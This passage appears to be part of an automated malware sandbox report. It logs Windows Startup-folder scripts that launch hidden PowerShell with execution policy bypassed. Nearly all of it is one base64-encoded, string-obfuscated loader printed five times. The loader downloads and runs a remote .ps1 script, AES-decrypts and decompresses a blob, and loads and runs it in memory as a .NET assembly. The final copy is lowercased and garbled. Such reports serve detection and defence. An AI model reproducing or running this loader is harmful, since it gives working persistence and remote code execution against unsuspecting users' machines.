3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3